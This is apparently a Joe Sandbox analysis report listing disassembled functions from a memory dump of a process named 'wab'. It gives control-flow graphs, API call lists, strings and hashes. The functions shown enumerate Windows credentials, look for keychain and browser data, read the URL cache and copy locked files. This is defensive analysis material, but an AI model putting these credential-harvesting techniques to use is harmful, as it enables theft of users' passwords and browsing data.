                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: InfoSystemmemset
                                                • String ID:
                                                • API String ID: 3558857096-0
                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                APIs
                                                • memset.MSVCRT ref: 004455C2
                                                • wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 0044570D
                                                • memset.MSVCRT ref: 00445725
                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                • memset.MSVCRT ref: 0044573D
                                                • memset.MSVCRT ref: 00445755
                                                • memset.MSVCRT ref: 004458CB
                                                • memset.MSVCRT ref: 004458E3
                                                • memset.MSVCRT ref: 0044596E
                                                • memset.MSVCRT ref: 00445A10
                                                • memset.MSVCRT ref: 00445A28
                                                • memset.MSVCRT ref: 00445AC6
                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                • memset.MSVCRT ref: 00445B52
                                                • memset.MSVCRT ref: 00445B6A
                                                • memset.MSVCRT ref: 00445C9B
                                                • memset.MSVCRT ref: 00445CB3
                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                • memset.MSVCRT ref: 00445B82
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                • memset.MSVCRT ref: 00445986
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                • API String ID: 2745753283-3798722523
                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                • String ID: $/deleteregkey$/savelangfile
                                                • API String ID: 2744995895-28296030
                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                • wcsrchr.MSVCRT ref: 0040B738
                                                • memset.MSVCRT ref: 0040B756
                                                • memset.MSVCRT ref: 0040B7F5
                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                • memset.MSVCRT ref: 0040B851
                                                • memset.MSVCRT ref: 0040B8CA
                                                • memcmp.MSVCRT ref: 0040B9BF
                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                • memset.MSVCRT ref: 0040BB53
                                                • memcpy.MSVCRT ref: 0040BB66
                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                • String ID: chp$v10
                                                • API String ID: 170802307-2783969131
                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                • memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                • wcschr.MSVCRT ref: 0040E3B8
                                                • memcpy.MSVCRT ref: 0040E3EC
                                                • memcpy.MSVCRT ref: 0040E407
                                                • memcpy.MSVCRT ref: 0040E422
                                                • memcpy.MSVCRT ref: 0040E43D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                • API String ID: 3073804840-2252543386
                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                • String ID:
                                                • API String ID: 3715365532-3916222277
                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                • String ID: bhv
                                                • API String ID: 327780389-2689659898
                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                • API String ID: 2941347001-70141382
                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 711 4467ac-4467b7 __setusermatherr 702->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->712 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->702 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 727 446853-446864 GetStartupInfoW 720->727 728 44684d-446851 720->728 721->719 722->718 722->723 723->720 725 446840-446842 723->725 725->720 729 446866-44686a 727->729 730 446879-44687b 727->730 728->725 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                • String ID:
                                                • API String ID: 2827331108-0
                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                • wcschr.MSVCRT ref: 0040C324
                                                • wcschr.MSVCRT ref: 0040C344
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                • GetLastError.KERNEL32 ref: 0040C373
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                • String ID: visited:
                                                • API String ID: 1157525455-1702587658
                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
